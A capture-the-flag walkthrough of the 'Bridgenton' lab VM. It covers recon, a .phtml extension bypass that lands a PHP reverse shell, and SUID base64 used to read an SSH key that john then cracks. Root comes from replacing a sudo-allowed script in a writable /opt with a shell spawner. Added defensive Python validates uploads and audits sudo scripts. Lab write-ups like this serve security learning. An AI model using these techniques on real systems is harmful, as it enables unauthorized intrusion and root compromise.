TheHackersLabs Bridgenton: Detailed Machine Walkthrough (WP)
城南花已开 Lv5

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.137 08:00:27:c0:90:1b (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.929 seconds (132.71 hosts/sec). 4 responded
export ip=192.168.60.137
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.137:22
Open 192.168.60.137:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 19:40 CST
Initiating ARP Ping Scan at 19:40
Scanning 192.168.60.137 [1 port]
Completed ARP Ping Scan at 19:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:40
Completed Parallel DNS resolution of 1 host. at 19:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:40
Scanning 192.168.60.137 [2 ports]
Discovered open port 22/tcp on 192.168.60.137
Discovered open port 80/tcp on 192.168.60.137
Completed SYN Stealth Scan at 19:40, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.137
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-01-04 19:40:24 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:C0:90:1B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

File Upload

Port 80 is open; browsing to it reveals that you can register an account.


When I tried to upload an image with an embedded PHP payload (an image webshell), the upload was refused.

Even a normal image with an allowed extension could not be uploaded ⁉️

Renaming the PHP reverse shell to a .phtml extension, however, uploaded successfully.
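As an added example (not from the original post or the target application), here is an allowlist-based upload check in Python that closes the gap used above: it accepts exactly one extension from an explicit image allowlist and checks the body's magic bytes, so a renamed .phtml shell is rejected no matter how long a denylist would have to be. The function name and the magic-byte table are my own assumptions.

```python
import os
import re

# Allowlist of extensions the upload endpoint accepts. A denylist that only
# blocks ".php" misses ".phtml", ".phar", ".php5", ... which Debian's default
# PHP handler still executes; that gap is what the .phtml rename slips through.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}

# Leading magic bytes per allowed type (constructed table, not exhaustive).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "jpg": b"\xff\xd8\xff",
         "jpeg": b"\xff\xd8\xff", "gif": b"GIF8"}

SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def validate_upload(filename, head):
    """Return (accepted, reason). `head` is the first bytes of the body.
    Rejects path components, multiple extensions (shell.php.png), dotfiles
    (.htaccess), non-allowlisted extensions and bodies whose magic bytes
    do not match the declared image type."""
    if os.path.basename(filename) != filename:
        return False, "path components not allowed"
    parts = filename.split(".")
    if len(parts) != 2:
        return False, "exactly one extension required"
    stem, ext = parts[0], parts[1].lower()
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in file name"
    if ext not in ALLOWED_EXT:
        return False, "extension .%s not in allowlist" % ext
    if not head.startswith(MAGIC[ext]):
        return False, "body does not look like a .%s image" % ext
    return True, "ok"
```

Even with this check in place, the upload directory should be served with script execution disabled, so a file that slips through is downloaded rather than run.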


I ran a directory scan:

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.137
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://192.168.60.137/uploads/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.137/javascript/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

User Privilege Escalation

Requesting the uploaded file under the uploads directory triggers the reverse shell.

❯ pwncat-cs -lp 4444
[20:03:56] Welcome to pwncat 🐈! __main__.py:164
[20:03:57] received connection from 192.168.60.137:36494 bind.py:84
[20:03:57] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[20:03:58] 192.168.60.137:36494: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@Bridgenton:/$

Further enumeration from the webshell

base64 turns out to have the SUID bit set.

(remote) www-data@Bridgenton:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/base64
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Try reading the private key file with it (SUID base64 runs as root, so it can read files www-data cannot):

(remote) www-data@Bridgenton:/$ base64 /home/james/.ssh/id_rsa|base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

Crack the key's passphrase; I think I ran into this password on another machine before 🤣

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bowwow (id_rsa)
1g 0:00:00:07 DONE (2025-01-04 20:14) 0.1351g/s 43.24p/s 43.24c/s 43.24C/s adidas..101010
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Root Privilege Escalation

Connect over SSH and find that the user has sudo rights.

❯ ssh james@192.168.60.137 -i id_rsa
james@192.168.60.137's password:
Linux Bridgenton 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 2 10:32:50 2024 from 192.168.1.41
james@Bridgenton:~$ cat user.txt
8e18fa38b2b24be6999bf8bf00a47cb5
james@Bridgenton:~$ sudo -l
Matching Defaults entries for james on Bridgenton:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User james may run the following commands on Bridgenton:
(root) NOPASSWD: /usr/bin/python3 /opt/example.py

We cannot write to this file, but the /opt directory that holds it is writable by us (james owns it).

So simply delete the file and recreate it.

james@Bridgenton:~$ ls -al /opt/example.py
-rw-r--r-- 1 root root 132 abr 1 2024 /opt/example.py
james@Bridgenton:~$ ls -al /
total 68
drwxr-xr-x 18 root root 4096 mar 29 2024 .
drwxr-xr-x 18 root root 4096 mar 29 2024 ..
lrwxrwxrwx 1 root root 7 mar 29 2024 bin -> usr/bin
drwxr-xr-x 3 root root 4096 mar 29 2024 boot
drwxr-xr-x 17 root root 3320 ene 4 12:39 dev
drwxr-xr-x 72 root root 4096 ene 4 13:07 etc
drwxr-xr-x 3 root root 4096 mar 29 2024 home
lrwxrwxrwx 1 root root 30 mar 29 2024 initrd.img -> boot/initrd.img-6.1.0-18-amd64
lrwxrwxrwx 1 root root 30 mar 29 2024 initrd.img.old -> boot/initrd.img-6.1.0-18-amd64
lrwxrwxrwx 1 root root 7 mar 29 2024 lib -> usr/lib
lrwxrwxrwx 1 root root 9 mar 29 2024 lib64 -> usr/lib64
drwx------ 2 root root 16384 mar 29 2024 lost+found
drwxr-xr-x 3 root root 4096 mar 29 2024 media
drwxr-xr-x 2 root root 4096 mar 29 2024 mnt
drwxr-xr-x 2 james root 4096 abr 1 2024 opt
dr-xr-xr-x 146 root root 0 ene 4 12:39 proc
drwx------ 4 root root 4096 abr 2 2024 root
drwxr-xr-x 19 root root 560 ene 4 13:15 run
lrwxrwxrwx 1 root root 8 mar 29 2024 sbin -> usr/sbin
drwxr-xr-x 2 root root 4096 mar 29 2024 srv
dr-xr-xr-x 13 root root 0 ene 4 12:39 sys
drwxrwxrwt 8 root root 4096 ene 4 13:09 tmp
drwxr-xr-x 12 root root 4096 mar 29 2024 usr
drwxr-xr-x 12 root root 4096 mar 29 2024 var
lrwxrwxrwx 1 root root 27 mar 29 2024 vmlinuz -> boot/vmlinuz-6.1.0-18-amd64
lrwxrwxrwx 1 root root 27 mar 29 2024 vmlinuz.old -> boot/vmlinuz-6.1.0-18-amd64

Write a new example.py:

james@Bridgenton:~$ rm /opt/example.py
rm: ¿borrar el fichero regular '/opt/example.py' protegido contra escritura? (s/n) y
james@Bridgenton:~$ vi /opt/example.py
import os; os.system("/bin/sh")
james@Bridgenton:/opt$ sudo /usr/bin/python3 /opt/example.py
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
73f441f6bf5ed73b61dc53d317d51478
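As an added defender-side check (not part of the original writeup), the following Python audits a sudo-allowed script the way the /opt case above demands: it walks every ancestor directory and flags any the user can write, because a writable parent lets a root-owned, non-writable file be unlinked and replaced. `demo_scenario` rebuilds that layout in a temporary directory with constructed contents; function names are my own assumptions.

```python
import os
import stat
import tempfile

def mode_allows_write(st_uid, st_gid, mode, uid, gids):
    """DAC check for a non-root user uid (member of gids): may it write an
    object owned by st_uid:st_gid with permission bits `mode`?"""
    if st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)

def audit_sudo_script(script_path, uid, gids):
    """Audit a script the user may run as root via sudo. The file's own mode
    is not enough: a writable ancestor directory lets the user unlink the
    root-owned file and recreate it (the rm + vi trick used on /opt above).
    Sticky-bit directories such as /tmp are still reported as findings."""
    def writable(p):
        st = os.stat(p)
        return mode_allows_write(st.st_uid, st.st_gid, st.st_mode, uid, gids)

    path = os.path.abspath(script_path)
    writable_dirs, d = [], os.path.dirname(path)
    while True:
        if writable(d):
            writable_dirs.append(d)
        if d == os.path.dirname(d):      # reached "/"
            break
        d = os.path.dirname(d)
    file_writable = writable(path)
    return {"script": path, "file_writable": file_writable,
            "writable_dirs": writable_dirs,
            "safe": not file_writable and not writable_dirs}

def demo_scenario():
    """Constructed reproduction of the Bridgenton layout in a temp dir: the
    script is read-only (0444) but its directory is owner-writable, like
    the james-owned /opt. Adds 'demo_dir_flagged' to the audit result."""
    base = tempfile.mkdtemp()
    opt = os.path.join(base, "opt")
    os.mkdir(opt, 0o755)
    script = os.path.join(opt, "example.py")
    with open(script, "w") as f:
        f.write("print('hello')\n")
    os.chmod(script, 0o444)
    uid, gids = os.getuid(), set(os.getgroups()) | {os.getgid()}
    res = audit_sudo_script(script, uid, gids)
    res["demo_dir_flagged"] = opt in res["writable_dirs"]
    return res
```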